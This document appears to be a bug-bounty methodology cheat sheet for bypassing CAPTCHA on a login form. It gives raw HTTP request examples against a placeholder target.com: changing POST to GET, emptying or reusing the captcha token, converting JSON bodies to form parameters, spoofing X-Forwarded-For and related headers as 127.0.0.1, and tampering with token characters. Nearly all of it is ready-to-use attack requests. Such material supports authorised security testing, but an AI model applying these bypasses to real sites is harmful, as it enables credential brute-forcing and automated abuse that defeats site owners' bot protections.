Bypass Captcha
How to test for captcha bypass
CAPTCHA | Sec-88
Web_Hacking/Captcha Bypass.md at main · Mehdi0x90/Web_Hacking
Bug-Bounty-Methodology/Captcha.md at main · tuhin1729/Bug-Bounty-Methodology
Things to try
1 - Try changing the request method, for example
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
POST to GET - Change the method to GET
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
Host: http://target.com
...
2 - Try remove the value of the captcha parameter
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=&_Username=daffa&_Password=test123
3 - Try reuse old captcha token
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
4 - Convert JSON data to normal request parameter
POST / HTTP 1.1
Host: http://target.com
...
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
Convert to normal request
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
5 - Try custom header to bypass captcha
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
6 - Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
Try this to bypass
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123